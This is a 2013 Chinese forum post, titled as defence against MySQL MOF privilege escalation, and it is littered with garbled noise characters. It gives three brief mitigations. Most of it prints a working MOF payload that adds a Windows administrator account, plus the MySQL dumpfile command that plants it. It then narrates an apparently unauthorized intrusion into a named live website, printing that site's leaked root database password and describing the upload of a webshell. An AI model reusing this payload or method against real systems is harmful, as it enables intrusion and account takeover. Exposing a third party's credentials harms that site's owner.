Mysql mof扩展漏洞防范方法
* g8 @& q" t5 j6 c" S2 h: X1 P F4 \( L% r, h4 b- }
网上公开的一些利用代码:2 g5 N/ N+ r- x- o! ~
" i! c9 i% x3 i
#pragma namespace(“\\\\.\\root\\subscription”)
+ @4 d9 f+ {2 Q2 q: f
^/ _% G. E. p4 i' ginstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };6 |0 n$ y6 n Z1 M, H) k8 B Z8 k
I3 X9 v( w: `* f6 ]3 Q& N 8 I; `/ I5 \& D) N \+ y
4 }) o9 a# m1 X* n4 y9 `
}% B7 S% o2 x4 E" h
8 ^: Z+ J1 l6 w
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;& f2 p, Y" q, ^
从上面代码来看得出解决办法:" O0 b$ k' }/ Q! a
3 F5 G, ~' {4 t' G3 W, ]! H1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
8 C) X0 J" f( S& O! Z2 T+ M* n& E5 _; g v
2、禁止使用”WScript.Shel”组件
' K2 D' Z) E; p+ W* u4 U1 T" a; Q' C& J3 k/ \* C' j
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER4 F: H( B1 M" U4 g
# P( w5 `& q! N9 H2 k; C当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
( F3 I5 c W8 L6 w% B
9 F( \. U) O' k" L- h事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权% r# w$ y9 x" d: w
; z+ f& I2 l# |! _2 ^" p但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
0 n9 I6 _7 e3 ~* q, a% W4 a( }9 s) l, }5 w
看懂了后就开始练手吧; ^# J( t4 N2 T( G8 }8 z' @: Y9 z
$ I. r3 I$ c4 R2 K3 _* G* Qhttp://www.webbmw.com/config/config_ucenter.php 一句话 a
$ e+ @& X! k2 e# ^* ?& `
: H& u9 M V) q+ H% M' z$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
+ E- S% i3 w9 Q' M6 q8 }) ^( D- r R8 c u1 |* M/ R# a
于是直接用菜刀开搞
8 c1 @: X3 _7 H4 q' _& O) t$ G! L3 [5 a+ Y2 A
上马先! {9 e7 K5 f6 g/ t q2 V, ]
* @- _( _7 T" O. ]" I既然有了那些账号 之类的 于是我们就执行吧…….
% {5 z5 S' l; X1 ~+ e' z6 O, {' G; f5 A
小小的说下 h9 ?; c3 c1 P
& d( R8 L3 s9 ?# h$ b8 a6 d9 m
在这里第1次执行未成功 原因未知, F' Y% w) X5 P* t
+ y7 g& ?& ~2 M" b& \1 J
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。4 z6 c1 o: q! F7 f9 L* w1 [, r
1 l/ |' S6 p- j' d) M#pragma namespace(“\\\\.\\root\\subscription”)
7 ?# P. M0 g" Q3 m
5 a5 a* ^7 k$ R( d. U5 U8 i0 Vinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };9 b. b5 E3 f# b' R: ?
* L% a0 Z6 N1 s$ l$ o) C0 b7 o' d6 k我是将文件放到C:\WINDOWS\temp\1.mof
2 j W3 V# I2 @0 U
0 }) [( u( p1 P, ^4 L* Q- \所以我们就改下执行的代码' ~* I- ~, [1 E0 D/ s3 h
- ?5 {7 ]1 v, ~( Rselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;4 ?5 a& n* k& m. |7 B1 i/ [# g9 F7 |
6 x7 a- P5 {8 ?" s/ K
7 Q; `% ^) h2 B: i
3 a* t) j( t; G6 f7 p但是 你会发现账号还是没有躺在那里。。( u$ i6 |9 r- s% Y/ S. t' {$ [& d. z
^! ?5 Z! y0 ~/ |) ~3 P
于是我就感觉蛋疼. U# J. n/ A8 @7 M. J- E
3 T& z6 x. J" m7 |2 u; a1 S4 s% x就去一个一个去执行 但是执行到第2个 mysql时就成功了………" \( [+ d t; O1 z# n
0 `' c) H. l* i7 k3 L$ Z* ~! |
1 K; ~: z* v( f, t! _
! W+ U. e! L8 N: t" W
但是其他库均不成功…
" @% v2 h- O* Y/ ?2 x
# J3 S$ M Y% @0 o我就很费解呀 到底为什么不成功求大牛解答…
' q d8 [ f' L
) S4 o" g0 ~+ L# P1 y, h F. ?: N! s3 b2 g9 {, F5 D
- h& ^7 `6 n2 R3 C! u4 e5 e2 d
|
发表于 2013-1-4 19:49:49
收藏
支持
反对